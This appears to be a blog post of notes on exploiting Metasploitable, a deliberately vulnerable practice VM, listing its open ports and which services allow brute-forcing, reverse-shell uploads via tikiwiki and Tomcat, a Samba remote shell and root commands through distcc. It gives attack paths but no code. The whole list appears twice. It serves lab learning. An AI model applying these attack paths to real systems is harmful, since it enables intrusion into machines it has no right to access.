metasploitable exploits
Metasploit have a test VM which they call "Metasplotiable", it can be downloaded and used to try out Metasploit. I recommend using the backtrack VM image to do this as it's easier then install metasploit and it comes with lots of other useful tools.
However I couldn't find a comprehensive list of vulnerabilities which can be exploited; so here are my notes. I've tried not to give too much away but of course going to be a partial spoiler. So see what you can find for yourself before cross checking against my list.
21/tcp open ftp ProFTPD 1.3.1
# Not a vulnerable version, although an obvious security risk but could be brute forced.
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
# Again no specific vulnerability found but could be brute forced
23/tcp open telnet Linux telnetd
# Again no specific vulnerability found but could be brute forced
25/tcp open smtp Postfix smtpd
# No specific vulnerability found but doesn't require authentication so could be used for social engineering attacks.
53/tcp open domain ISC BIND 9.4.2
# Not a vulnerable version
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
# Not a vulnerable apache version
# multiple php services run on this port
# direct listing enabled multiple paths
# http trace enabled and is vulnerable to xss attacks
## Wep Apps##
# phpinfo.php - serious information disclosure, may also have vulnerabilities
# twiki - multiple vulnerabilities. Can be used to list files and run shell commands. Should also have include uploaded file vulnerabilities, although I haven't tried it.
# tikiwiki - multiple vulnerabilities,
# one enables db connection details to be extracted remotely. Get admin password from db and then can upload reverse-shell php script.
# Shell will run with permissions of webserver.
# The over is a buffer overflow and allows a "Meterpreter" payload to be deployed, giving root access and is very cool.
# cgi-bin - is empty, which is shame but could be used place a remote-shell into.
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Definitely Vulnerably, possibly multiple remote buffer-overflows. Remote user can trivially gain remote shell.
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Not linked to above
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
# Not a vulnerable version, although an obvious security risk but as it could be brute forced.
# Contains data for twiki and twikiwiki services on port 80
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
# Not a vulnerable version, although an obvious security risk but could be brute forced.
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
# I could find any exploits for this, AJP is normally associated with tomcat connectors.
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
# Password can be found using default user and password metasploit.
# There is then a metasploit script to upload a jsp remote-shell
# shell we have webserver permissions.
distcc_exec (3632)
# can run remote commands as root
I've since realised some of this information is in the readme file that is in the metasploitable download but my post is more detailed, so I'll leave it up.
Infering from the readme file it doesn't appear that I've missed any thing. There is a todo in the readme to change the proftp and postfix apps to different versions.
However I couldn't find a comprehensive list of vulnerabilities which can be exploited; so here are my notes. I've tried not to give too much away but of course going to be a partial spoiler. So see what you can find for yourself before cross checking against my list.
21/tcp open ftp ProFTPD 1.3.1
# Not a vulnerable version, although an obvious security risk but could be brute forced.
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
# Again no specific vulnerability found but could be brute forced
23/tcp open telnet Linux telnetd
# Again no specific vulnerability found but could be brute forced
25/tcp open smtp Postfix smtpd
# No specific vulnerability found but doesn't require authentication so could be used for social engineering attacks.
53/tcp open domain ISC BIND 9.4.2
# Not a vulnerable version
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
# Not a vulnerable apache version
# multiple php services run on this port
# direct listing enabled multiple paths
# http trace enabled and is vulnerable to xss attacks
## Wep Apps##
# phpinfo.php - serious information disclosure, may also have vulnerabilities
# twiki - multiple vulnerabilities. Can be used to list files and run shell commands. Should also have include uploaded file vulnerabilities, although I haven't tried it.
# tikiwiki - multiple vulnerabilities,
# one enables db connection details to be extracted remotely. Get admin password from db and then can upload reverse-shell php script.
# Shell will run with permissions of webserver.
# The over is a buffer overflow and allows a "Meterpreter" payload to be deployed, giving root access and is very cool.
# cgi-bin - is empty, which is shame but could be used place a remote-shell into.
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Definitely Vulnerably, possibly multiple remote buffer-overflows. Remote user can trivially gain remote shell.
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Not linked to above
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
# Not a vulnerable version, although an obvious security risk but as it could be brute forced.
# Contains data for twiki and twikiwiki services on port 80
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
# Not a vulnerable version, although an obvious security risk but could be brute forced.
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
# I could find any exploits for this, AJP is normally associated with tomcat connectors.
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
# Password can be found using default user and password metasploit.
# There is then a metasploit script to upload a jsp remote-shell
# shell we have webserver permissions.
distcc_exec (3632)
# can run remote commands as root
I've since realised some of this information is in the readme file that is in the metasploitable download but my post is more detailed, so I'll leave it up.
Infering from the readme file it doesn't appear that I've missed any thing. There is a todo in the readme to change the proftp and postfix apps to different versions.
Comments
Post a Comment